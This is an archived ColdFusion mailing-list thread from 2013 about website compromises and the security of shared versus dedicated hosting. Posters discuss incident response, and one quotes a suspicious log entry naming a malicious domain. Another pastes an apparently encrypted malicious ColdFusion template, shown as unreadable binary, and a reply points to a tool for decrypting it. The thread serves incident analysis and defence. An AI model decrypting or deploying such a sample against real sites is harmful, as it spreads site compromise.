RE: New Round of Exploits going on
Why not just get your own server. -Original Message- From: Russ Michaels [mailto:r...@michaels.me.uk] Sent: Tuesday, February 12, 2013 5:54 AM To: cf-talk Subject: Re: New Round of Exploits going on Byron, That is partly true, if you make certain assumptions, but things are not quite that simple, considering the following. Let say you get your own server to host your own site. And that is it, you do not do any kind of lockdown, do not keep your patches and hotfixes up to date, do no monitoring what so ever. Then yes in such a scenario the shared server will be safer in general because your server as a whole is not secure, so a vulnerability on the server is more likely. So getting a server with no idea what your doing and no management or support, would be pretty dumb. If you do not have the skills to manage it yourself and make sure it is secure then you should be paying you host or someone else to do this for you. However if you are running a server with *ONLY* your own site on it, your chances of being attacked in the first place are much less than a shared server, Consider that a shared server is going to have *AT LEAST* 200 other sites on it, probably more, and attackers generally target a list of domains/websites rather than the server itself when looking for vulnerabilities, so that is a 20,000% increase in your chances of being hacked due to other websites on the server already Lets also consider that your own site is written in CF, and so CF is the only thing you would have installed on your own server. So you only have one application layer attack vector. But on a shared server your also going to have ASP, .NET, Perl, PHP, Ruby and probably more, so that has just increased the possible attack vectors by at least another 500% On Tue, Feb 12, 2013 at 6:37 AM, Byron Mann byronos...@gmail.com wrote: (apologies for the length) Russ, I can tell by your comments that you either have dealt with a lot of hosts or have worked or owned one. Well said. Having worked in the Hosting space for more than 10 years now, I can safely say there is absolutely no 100% way to prevent these exploits on any platform. That is not to say there are not more secure options than shared hosting, but even at that you may need the above average skill set. I can make an argument that shared CF hosting is probably more secure for half the people using Coldfusion out there. How and why? Well most probably have no one actively monitoring their servers. Not only do we have ourselves and tools looking at the servers, but our customers who make us instantly aware of an issue. Even a subpar host probably has a better lock down on CF than many non host managed CF users. How many can say they don't have root kits (or even know what that is) running on their server? Probably a lot on this list, but the average vps, cloud or dedicated user out there, ummm probably not. Example, there was a recent issue we had with hidden elements being injected to files on a shared server. This was actually a customer running Wordpress. How many out there would have found that and how quickly, say on a dedicated server with a site that only gets updated once a month. The best you can do is be vigilant, do your patching and homework and when the next compromise comes, take it on the cheek, mitigate, and take what you learned and try to improve for the next go around. And if you are a hosting customer, it's up to you to be aware and educated on what a host should and shouldn't be doing (aka this list). And then decide if it's time to move on or acceptable to you. Of course I'm speaking in general terms, as this is the case with not only CF, but all platforms. How many times a week do we hear about a drupal or Wordpress issue, just about as often as CF, but if not more. Quick fact, we have more dedicated, vps, cloud (vms) revenue effected by compromises than our shared customers. But let's not all forget the real problem here. It's not cf users, the host or Adobe's fault. It's the dirt bags out there who make escalations happen that result in the 3 am phone calls. Byron Mann Lead Engineer Architect HostMySite.com ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354530 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
RE: New Round of Exploits going on
Maybe, money? -Original Message- From: Revolution [mailto:houseoffusion_...@internetemail.info] Sent: Friday, February 15, 2013 7:56 AM To: cf-talk Subject: RE: New Round of Exploits going on Why not just get your own server. -Original Message- From: Russ Michaels [mailto:r...@michaels.me.uk] Sent: Tuesday, February 12, 2013 5:54 AM To: cf-talk Subject: Re: New Round of Exploits going on Byron, That is partly true, if you make certain assumptions, but things are not quite that simple, considering the following. Let say you get your own server to host your own site. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354535 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
RE: New Round of Exploits going on
And skills, did you actually read the discussion? Regards Russ Michaels www.michaels.me.uk www.cfmldeveloper.com - Free CFML hosting for developers www.cfsearch.com - CF search engine On Feb 15, 2013 9:13 PM, Stephens, Larry V steph...@iu.edu wrote: Maybe, money? -Original Message- From: Revolution [mailto:houseoffusion_...@internetemail.info] Sent: Friday, February 15, 2013 7:56 AM To: cf-talk Subject: RE: New Round of Exploits going on Why not just get your own server. -Original Message- From: Russ Michaels [mailto:r...@michaels.me.uk] Sent: Tuesday, February 12, 2013 5:54 AM To: cf-talk Subject: Re: New Round of Exploits going on Byron, That is partly true, if you make certain assumptions, but things are not quite that simple, considering the following. Let say you get your own server to host your own site. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354537 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: New Round of Exploits going on
Byron, That is partly true, if you make certain assumptions, but things are not quite that simple, considering the following. Let say you get your own server to host your own site. And that is it, you do not do any kind of lockdown, do not keep your patches and hotfixes up to date, do no monitoring what so ever. Then yes in such a scenario the shared server will be safer in general because your server as a whole is not secure, so a vulnerability on the server is more likely. So getting a server with no idea what your doing and no management or support, would be pretty dumb. If you do not have the skills to manage it yourself and make sure it is secure then you should be paying you host or someone else to do this for you. However if you are running a server with *ONLY* your own site on it, your chances of being attacked in the first place are much less than a shared server, Consider that a shared server is going to have *AT LEAST* 200 other sites on it, probably more, and attackers generally target a list of domains/websites rather than the server itself when looking for vulnerabilities, so that is a 20,000% increase in your chances of being hacked due to other websites on the server already Lets also consider that your own site is written in CF, and so CF is the only thing you would have installed on your own server. So you only have one application layer attack vector. But on a shared server your also going to have ASP, .NET, Perl, PHP, Ruby and probably more, so that has just increased the possible attack vectors by at least another 500% On Tue, Feb 12, 2013 at 6:37 AM, Byron Mann byronos...@gmail.com wrote: (apologies for the length) Russ, I can tell by your comments that you either have dealt with a lot of hosts or have worked or owned one. Well said. Having worked in the Hosting space for more than 10 years now, I can safely say there is absolutely no 100% way to prevent these exploits on any platform. That is not to say there are not more secure options than shared hosting, but even at that you may need the above average skill set. I can make an argument that shared CF hosting is probably more secure for half the people using Coldfusion out there. How and why? Well most probably have no one actively monitoring their servers. Not only do we have ourselves and tools looking at the servers, but our customers who make us instantly aware of an issue. Even a subpar host probably has a better lock down on CF than many non host managed CF users. How many can say they don't have root kits (or even know what that is) running on their server? Probably a lot on this list, but the average vps, cloud or dedicated user out there, ummm probably not. Example, there was a recent issue we had with hidden elements being injected to files on a shared server. This was actually a customer running Wordpress. How many out there would have found that and how quickly, say on a dedicated server with a site that only gets updated once a month. The best you can do is be vigilant, do your patching and homework and when the next compromise comes, take it on the cheek, mitigate, and take what you learned and try to improve for the next go around. And if you are a hosting customer, it's up to you to be aware and educated on what a host should and shouldn't be doing (aka this list). And then decide if it's time to move on or acceptable to you. Of course I'm speaking in general terms, as this is the case with not only CF, but all platforms. How many times a week do we hear about a drupal or Wordpress issue, just about as often as CF, but if not more. Quick fact, we have more dedicated, vps, cloud (vms) revenue effected by compromises than our shared customers. But let's not all forget the real problem here. It's not cf users, the host or Adobe's fault. It's the dirt bags out there who make escalations happen that result in the 3 am phone calls. Byron Mann Lead Engineer Architect HostMySite.com ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354474 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: New Round of Exploits going on
Unfortunately Andrew things are never that simple. For every customer like yourself who wants this turned off, there will be 100 customers who want it turned on. Most people do not know about or care about the security side of hosting, and just want everything enabled which makes their life easier. So as soon as they hear the word disabled, their initial response will be things like. 1) Our previous host did not do this 2) Then we will have to look for another host Many hosts are i'm sure simply giving in to the demands of the majority of their customers and providing them with the services they want even though they are insecure. I regularly explain to customers/developers why cfexecute is disabled, by they do not have read/write access to the entire server, why createobject(java) is disabled by default, and in in general why things have to be locked down on a shared server. We do however stick to our main security policies, so our servers are more secure than most, but this of course comes at a cost as many customers simply will not accept such restrictions and would rather go and find an insecure host instead. At the end of the day If you want security and control over your hosting environment the solution is simple, DO NOT USE SHARED HOSTING. On Mon, Feb 11, 2013 at 5:32 AM, Andrew Scott andr...@andyscott.id.auwrote: One thing I hate about some hosting companies is that they have Robust Exceptions switched on, but what concerns me even more is that they don't care that this is a security risk... If your hosting company is one of them, get in their ears about having it switched off. If they refuse then its time for a change. -- Russ Michaels www.bluethunderinternet.com : Business hosting services solutions www.cfmldeveloper.com: ColdFusion developer community www.michaels.me.uk : my blog www.cfsearch.com : ColdFusion search engine ** *skype me* : russmichaels ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354448 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: New Round of Exploits going on
Yeah I guess, but that is why there are log files so there is really no excuse. But how cost efficient would it be to just move those people over to their own server so they can effect themselves? And I would bet that it is these people who also turn off UAC on Windows and get all types of infections and could very well be the ones ftping up infected files to begin with. Russ, I hear you but then maybe they are better of else where if they can't understand the implications. -- Regards, Andrew Scott WebSite: http://www.andyscott.id.au/ Google+: http://plus.google.com/113032480415921517411 On Mon, Feb 11, 2013 at 9:15 PM, Russ Michaels r...@michaels.me.uk wrote: Unfortunately Andrew things are never that simple. For every customer like yourself who wants this turned off, there will be 100 customers who want it turned on. Most people do not know about or care about the security side of hosting, and just want everything enabled which makes their life easier. So as soon as they hear the word disabled, their initial response will be things like. 1) Our previous host did not do this 2) Then we will have to look for another host Many hosts are i'm sure simply giving in to the demands of the majority of their customers and providing them with the services they want even though they are insecure. I regularly explain to customers/developers why cfexecute is disabled, by they do not have read/write access to the entire server, why createobject(java) is disabled by default, and in in general why things have to be locked down on a shared server. We do however stick to our main security policies, so our servers are more secure than most, but this of course comes at a cost as many customers simply will not accept such restrictions and would rather go and find an insecure host instead. At the end of the day If you want security and control over your hosting environment the solution is simple, DO NOT USE SHARED HOSTING. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354449 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: New Round of Exploits going on
unfortunately no host can afford to tell all their customers your better off elsewhere. It would not be cost efficient at all to give a shared hosting customer their own server for the same price, they would lose money, I doubt the cost would even be remotely covered. Both of hose solutions would put any host out of business very quickly. On Mon, Feb 11, 2013 at 10:37 AM, Andrew Scott andr...@andyscott.id.auwrote: Yeah I guess, but that is why there are log files so there is really no excuse. But how cost efficient would it be to just move those people over to their own server so they can effect themselves? And I would bet that it is these people who also turn off UAC on Windows and get all types of infections and could very well be the ones ftping up infected files to begin with. Russ, I hear you but then maybe they are better of else where if they can't understand the implications. -- Regards, Andrew Scott WebSite: http://www.andyscott.id.au/ Google+: http://plus.google.com/113032480415921517411 On Mon, Feb 11, 2013 at 9:15 PM, Russ Michaels r...@michaels.me.uk wrote: Unfortunately Andrew things are never that simple. For every customer like yourself who wants this turned off, there will be 100 customers who want it turned on. Most people do not know about or care about the security side of hosting, and just want everything enabled which makes their life easier. So as soon as they hear the word disabled, their initial response will be things like. 1) Our previous host did not do this 2) Then we will have to look for another host Many hosts are i'm sure simply giving in to the demands of the majority of their customers and providing them with the services they want even though they are insecure. I regularly explain to customers/developers why cfexecute is disabled, by they do not have read/write access to the entire server, why createobject(java) is disabled by default, and in in general why things have to be locked down on a shared server. We do however stick to our main security policies, so our servers are more secure than most, but this of course comes at a cost as many customers simply will not accept such restrictions and would rather go and find an insecure host instead. At the end of the day If you want security and control over your hosting environment the solution is simple, DO NOT USE SHARED HOSTING. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354450 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: New Round of Exploits going on
Russ, I never meant their own server. I meant put all customers who want the robust onto the same sever. But I did raise an enhancement with Adobe, where my suggestion is to have robust exceptions of by default and not be able to enable or disable from the CF admin. However if the customer wants to exploit their own site then they have the option to turn that level of exception on in the Application.cfc On Tue, Feb 12, 2013 at 3:05 AM, Russ Michaels r...@michaels.me.uk wrote: unfortunately no host can afford to tell all their customers your better off elsewhere. It would not be cost efficient at all to give a shared hosting customer their own server for the same price, they would lose money, I doubt the cost would even be remotely covered. Both of hose solutions would put any host out of business very quickly. On Mon, Feb 11, 2013 at 10:37 AM, Andrew Scott andr...@andyscott.id.au wrote: Yeah I guess, but that is why there are log files so there is really no excuse. But how cost efficient would it be to just move those people over to their own server so they can effect themselves? And I would bet that it is these people who also turn off UAC on Windows and get all types of infections and could very well be the ones ftping up infected files to begin with. Russ, I hear you but then maybe they are better of else where if they can't understand the implications. -- Regards, Andrew Scott WebSite: http://www.andyscott.id.au/ Google+: http://plus.google.com/113032480415921517411 On Mon, Feb 11, 2013 at 9:15 PM, Russ Michaels r...@michaels.me.uk wrote: Unfortunately Andrew things are never that simple. For every customer like yourself who wants this turned off, there will be 100 customers who want it turned on. Most people do not know about or care about the security side of hosting, and just want everything enabled which makes their life easier. So as soon as they hear the word disabled, their initial response will be things like. 1) Our previous host did not do this 2) Then we will have to look for another host Many hosts are i'm sure simply giving in to the demands of the majority of their customers and providing them with the services they want even though they are insecure. I regularly explain to customers/developers why cfexecute is disabled, by they do not have read/write access to the entire server, why createobject(java) is disabled by default, and in in general why things have to be locked down on a shared server. We do however stick to our main security policies, so our servers are more secure than most, but this of course comes at a cost as many customers simply will not accept such restrictions and would rather go and find an insecure host instead. At the end of the day If you want security and control over your hosting environment the solution is simple, DO NOT USE SHARED HOSTING. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354452 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: New Round of Exploits going on
I would not think that is a cost effective solution either as there is such a small number of customers who would request to be on a secure server. We offer something like that called semi-dedicated, but it is more expensive. If CF had a web admin like Railo, it would solve all those type of issues really. On Mon, Feb 11, 2013 at 4:21 PM, Andrew Scott andr...@andyscott.id.auwrote: Russ, I never meant their own server. I meant put all customers who want the robust onto the same sever. But I did raise an enhancement with Adobe, where my suggestion is to have robust exceptions of by default and not be able to enable or disable from the CF admin. However if the customer wants to exploit their own site then they have the option to turn that level of exception on in the Application.cfc On Tue, Feb 12, 2013 at 3:05 AM, Russ Michaels r...@michaels.me.uk wrote: unfortunately no host can afford to tell all their customers your better off elsewhere. It would not be cost efficient at all to give a shared hosting customer their own server for the same price, they would lose money, I doubt the cost would even be remotely covered. Both of hose solutions would put any host out of business very quickly. On Mon, Feb 11, 2013 at 10:37 AM, Andrew Scott andr...@andyscott.id.au wrote: Yeah I guess, but that is why there are log files so there is really no excuse. But how cost efficient would it be to just move those people over to their own server so they can effect themselves? And I would bet that it is these people who also turn off UAC on Windows and get all types of infections and could very well be the ones ftping up infected files to begin with. Russ, I hear you but then maybe they are better of else where if they can't understand the implications. -- Regards, Andrew Scott WebSite: http://www.andyscott.id.au/ Google+: http://plus.google.com/113032480415921517411 On Mon, Feb 11, 2013 at 9:15 PM, Russ Michaels r...@michaels.me.uk wrote: Unfortunately Andrew things are never that simple. For every customer like yourself who wants this turned off, there will be 100 customers who want it turned on. Most people do not know about or care about the security side of hosting, and just want everything enabled which makes their life easier. So as soon as they hear the word disabled, their initial response will be things like. 1) Our previous host did not do this 2) Then we will have to look for another host Many hosts are i'm sure simply giving in to the demands of the majority of their customers and providing them with the services they want even though they are insecure. I regularly explain to customers/developers why cfexecute is disabled, by they do not have read/write access to the entire server, why createobject(java) is disabled by default, and in in general why things have to be locked down on a shared server. We do however stick to our main security policies, so our servers are more secure than most, but this of course comes at a cost as many customers simply will not accept such restrictions and would rather go and find an insecure host instead. At the end of the day If you want security and control over your hosting environment the solution is simple, DO NOT USE SHARED HOSTING. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354456 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: New Round of Exploits going on
IF, and it's a large IF, but IF you're willing to maintain your own machine than a slicehost with an open source CFML engine isn't all that much more expensive than a shared hosting plan. For $20 USD a month you can have a linode running whatever flavor of headless linux that you want. Throw on Webmin/Virtualmin to handle site creation and updates. Throw on Railo on Tomcat. MySQL for DB, apache to serve web traffic. Use IPTables to lockdown all but SSH/HTTP/HTTPS/FTP/DNS. Virtualmin can be set to automatically check for package updates and deploy them on a set schedule. It can backup to an S3 bucket. Railo can be set to update automatically as well. Everything that is running is basically free, it's just going to cost you in time if you're not familiar with it. Now, the cost in time for setup? That's going to be higher than just going with a shared host, but I personally found that my time is far offset against dealing with the latest issues that have come up with vulnerabilities. NOTE: this doesn't address PCI compliance as I've not had to go down that route. In that instance shared may still yet be cheaper, but given the prices I've seen on shared hosts that are PCI compliant, I still think it'd be cheaper to roll your own. But then, I'm able to do the admin and dev side of things. -- Matthew Williams Geodesic GraFX www.geodesicgrafx.com/blog twitter.com/ophbalance ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354457 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: New Round of Exploits going on
Les Mizzell wrote: So, anybody know what this is doing? Allaire Cold Fusion Template Something similar came up on StackOverflow last week (possibly the same exploit). That guy said the old AB Positive Encrypt and Decrypt utility was able to decrypt the file: http://www.adobe.com/cfusion/exchange/index.cfm?event=extensionDetailextid=1007043 -Leigh ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354458 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: New Round of Exploits going on
Well I guess the ticket I raised is too late One can already do this cfset this.enablerobustexception = true / On Tue, Feb 12, 2013 at 3:53 AM, Leigh cfsearch...@yahoo.com wrote: Les Mizzell wrote: So, anybody know what this is doing? Allaire Cold Fusion Template Something similar came up on StackOverflow last week (possibly the same exploit). That guy said the old AB Positive Encrypt and Decrypt utility was able to decrypt the file: http://www.adobe.com/cfusion/exchange/index.cfm?event=extensionDetailextid=1007043 -Leigh ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354468 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: New Round of Exploits going on
(apologies for the length) Russ, I can tell by your comments that you either have dealt with a lot of hosts or have worked or owned one. Well said. Having worked in the Hosting space for more than 10 years now, I can safely say there is absolutely no 100% way to prevent these exploits on any platform. That is not to say there are not more secure options than shared hosting, but even at that you may need the above average skill set. I can make an argument that shared CF hosting is probably more secure for half the people using Coldfusion out there. How and why? Well most probably have no one actively monitoring their servers. Not only do we have ourselves and tools looking at the servers, but our customers who make us instantly aware of an issue. Even a subpar host probably has a better lock down on CF than many non host managed CF users. How many can say they don't have root kits (or even know what that is) running on their server? Probably a lot on this list, but the average vps, cloud or dedicated user out there, ummm probably not. Example, there was a recent issue we had with hidden elements being injected to files on a shared server. This was actually a customer running Wordpress. How many out there would have found that and how quickly, say on a dedicated server with a site that only gets updated once a month. The best you can do is be vigilant, do your patching and homework and when the next compromise comes, take it on the cheek, mitigate, and take what you learned and try to improve for the next go around. And if you are a hosting customer, it's up to you to be aware and educated on what a host should and shouldn't be doing (aka this list). And then decide if it's time to move on or acceptable to you. Of course I'm speaking in general terms, as this is the case with not only CF, but all platforms. How many times a week do we hear about a drupal or Wordpress issue, just about as often as CF, but if not more. Quick fact, we have more dedicated, vps, cloud (vms) revenue effected by compromises than our shared customers. But let's not all forget the real problem here. It's not cf users, the host or Adobe's fault. It's the dirt bags out there who make escalations happen that result in the 3 am phone calls. Byron Mann Lead Engineer Architect HostMySite.com ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354470 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
New Round of Exploits going on
It appears that there are either Web Developers running sites with current infections, or there is a new round happening. I have seen one site hacked twice in the last two weeks, and although they were never able to run the code, there is very little evidence that this exploit is from the web site it was found on. However the one thing that I noticed in the logs at the time of the modified HTML file, and yes they only modified HTML files and not CFML files, was that I found a HEAD request in the logs that came from a website that looked suspicious. When I googled this domain my AntiVirus detected this as a Black Hole Security Exploit, but what was worrying was that this log with the domain had the website that was hacked in the log. And it looks like this with the details changed to protect both parties. 2013-02-06 01:43:48 xxx.xxx.xxx.xxx HEAD / - 80 - xxx.xxx.xxx.xxx Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:18.0)+Gecko/20100101+Firefox/18.0 http://somedomain/?info/d http://luhafaki.eg.vg/?info/andyscott.id.au omainattacked 301 0 0 225 432 125 Now you can see that this was redirected, but if there is a known exploit these guys are still able to do this. As was evident with the latest Anonymous attacks. I encourage people to look at their websites and check to see if they have been infected with this new wave. I have gone through the logs of the website in question and there is no evidence that it was infected directly through the website, except for that one line in the log mentioned above. What really shocks me even more, is that the hosting company refuse to acknowledge that they may be responsible, which is fair enough if this website did not have all the checks to sanitize all form inputs with Anti Sammy. And there is also no evidence that this a SQL Injected attack either, which is near impossible unless there is a known bug with hibernate and its current binding of variables. Aka cfqueryparam for hibernate. Anyway as some people have mentioned that they have been attacked in the last few weeks, I wanted to share this as there seems to be a new exploit going around that may or may not be related to ColdFusion on shared hosts, but they seem to not care who they are infecting. -- Regards, Andrew Scott WebSite: http://www.andyscott.id.au/ Google+: http://plus.google.com/113032480415921517411 ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354443 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: New Round of Exploits going on
I just got the below on a site. Not sure how to decrypt to tell exactly what it's doing though. Client noticed that Google had flagged the site as 'comprimised. I'm pointing my finger at the hosting company - they've got a security issue if this can happen, correct? So, anybody know what this is doing? - Allaire Cold Fusion Template Header Size: New Version@ؤlº²BÃulYLöÂÂhqؤä8X°ɿÃò©ÂP^qvÃNÃÒùFÃû'ÃÃÕ¯Ãe ÂÃÃúÃáÂû!Ãp$sã¨Ã´Ã»Â\vÂùeÃÃÃ¥RV/е ú{ /ýÂèó^t¼ɮ?ÂÃtnÂö³zñ¤îÂ:XÃÖÃ(ÃÃÃ~)ۣ·Â* ì ·mîQPêlÂÂwré(²-ìÂ~s Â#ó(B]±nwÃí¸a TGmÂæalW][÷* Iû(þºú¢ÛÂ@ÂÂÃþk äF±Âî®lÂXFLõR±, Ò ¹Ô(]{ÂÃK~9î®lÂXFLõR±, Âéâ¡[V8cü_èQK^ ¦[AêÃ׻áº8'¹ïVÂcKWà éÃÃUÂhL½ .øá¡R¾ÃWxþÂöî®lÂXFLõR±, ÂTXÃà 8Ãëx«Ã=! ä±ÂWó§ÂÂYªÃå«#}yµ'X X·ÂæNÃ¥VÃͼ¿%V#Â6ÂÃ7à OÃ)Âæ*#pÂPOëPpÂÂÂWó§ÂÂYªÃåà OÂTFÃe X·ð ëo2]ÂÂͼ¿%V#Â6ÂÃ7à ÂáqtÃu!qö¬òÂ:Ã'ÂHÂNî®lÂXFLõR±, ÊƬ³Â,Â8rR+áÂ;¦fTm{$5fIHpOÃÃ-K©o+ÂÃE$f*íÂvÂÃB¥¦fTm{$5fIHpOÃ@Â¥ÃÏ~y`lÃjÃ0z\¸ÿê¬Â©Ã´Â³Â¥pEßµÃ/HÃÃS¸¿-ÃÂ3ú¼äU³ÃÃ׻áº8'¹ïVÂcKWN¡sdDgÂÃùAjÂÂ¥Ãy³Ã¿°Ã{Kî®lÂXFLõR±, Âñ*ÃrÂ?Ý®ÂÃv“ÂÃg¡$Ã9Âî®lÂXFLõR±, :6ôԸT¼}ÃbG¦`ðî¦fTm{$5fIHpOÃ8`Ó Âº2ÃÑÿ¬@à Ã}V|̽ \¸ÿê¬Â©Ã´Â³Â¥pEßµÃ/ÅԽæCϯ£ÂjKNö׻áº8'¹ïVÂcKWì¾ïNüÃ1¨--£s©sKÂðåW׻áº8'¹ïVÂcKWá?ÂÂÃàX·TôÃ^©ª»`ͼ¿%V#Â6ÂÃ7à ÂÃ}£d ½¬p!²E¤ñߴdÂ`'8OYgÕ=â/n׻áº8'¹ïVÂcKWRÃÂ¥t X·fJcÂlþ¸fͼ¿%V#Â6ÂÃ7à ÂÕ¨ R,`ÃÞ·M^R¯ê}OæÂÃͼ¿%V#Â6ÂÃ7à Ãi7pԳ´¯Â¢ÿ*\¸ÿê¬Â©Ã´Â³Â¥pEßµÃ/ðu§Â½(OÃ祹Ã3 ÃpÃÃæ7\¸ÿê¬Â©Ã´Â³Â¥pEßµÃ/gQ ú÷ç¼Ã½quv6TÂÂWó§ÂÂYªÃÃ¥Y~¡Xm»¸ã4ÿöèyoy@QvUcS`׻áº8'¹ïVÂcKWgÂSáÃàX·Dü¥ÂÃÃöͼ¿%V#Â6ÂÃ7à Â#âvû±Ââ8³GÔÂWó§ÂÂYªÃÃ¥Y~¡Xm»ÊƬ³Â,}B½à s¦fTm{$5fIHpOÃddà µ'ÃlÂÂÒ½rm[, ÃÃ¥;ò:WÃçåöby©Eà ¦¨Y!Ã#Âà YsKÂÙ;/׻áº8'¹ïVÂcKWÂÂyó±ýÂ:5IYÂ4)ÃAý!x²Ã׻áº8'¹ïVÂcKWCrFõîZ½ X·òÃâ¬Mͼ¿%V#Â6ÂÃ7à ÂÂðÃ÷¥ºBú÷Âj±Â׻áº8'¹ïVÂcKWÃ¥}°mb¿ X·ï3Ãõ$´ÃÃͼ¿%V#Â6ÂÃ7à Ãeh' wðô޲©é;gZCE ¸£whpî®lÂXFLõR±, 8;Ãù]¾¿¼0î$èìWÃçåöby©Eà ¦¨Y¢p$¸ÂXëÃn ÂÃng»Â·N0ì\¸ÿê¬Â©Ã´Â³Â¥pEßµÃ/´ÂýùÃÃYD¦Â°ÂÂWó§ÂÂYªÃÃ¥cÃS¶ÂHI-ÂÂ0uüÂÃKþÃÃRÂÂBÂÃÃcÂ)¦ͼ¿%V#Â6ÂÃ7à «.ZÂéÃ/ÂÂ_N.G |J\¸ÿê¬Â©Ã´Â³Â¥pEßµÃ/_]\ÃùÂöçOÃÔù¼DZ¡ÅBé0¦fTm{$5fIHpOÕ Ã£DøSÂ4C¬Ã2£3Â.ÂæalW][÷* óÂ2¢Âôà ÂX¨ÄÂUNM± §é¥÷Â׻áº8'¹ïVÂcKWZ¸;å´ü X·Â;ÃQ|dKͼ¿%V#Â6ÂÃ7à ¤ÂPï©õÂÃS5ñÃB£P1²¿ÂÂÂWó§ÂÂYªÃÃ¥cÃS¶ÂHIxÂ)«%Pý²v1°Ãá¦fTm{$5fIHpOÕ¤aÃQz]¬[ç@ºÃìéfæÂ.DÃgä/WÃçåöby©Eà ¦¨YnÂ.ÂÂÃrHýSámÃ.Z׻áº8'¹ïVÂcKW»Ã.Hú®c:5IYÂ4)Ã4Ãݪ'ÂHÂNî®lÂXFLõR±, ¥ãÂJÂ¥3±ÂÂTÂEWÃçåöby©Eà ¦¨YºùÂÃÃà ԩÃ[ÃîX¢EáYeÃlúîïlÂÂWó§ÂÂYªÃÃ¥cÃS¶ÂHI{±ñévøÂ9}¦ _¦fTm{$5fIHpOÃnÂaîó(WÂÂ+úà ¥NÂÃ\#ÃWÃçåöby©Eà ¦¨Y)ÂÃOÂÂÃpÃ)æÃÃÃ׻áº8'¹ïVÂcKWôåÃAãåÃ:5IYÂ4)ÃÃJÖ¥ô׻áº8'¹ïVÂcKWõºþðA\õ X·Ã!þFs¸!eͼ¿%V#Â6ÂÃ7à þï±Ã¾w0wQÐQÂwGÝeSyÇð¯¦fTm{$5fIHpOÕ¢SÃò ¤qòðëÂ1ÂxO ÂæalW][÷* 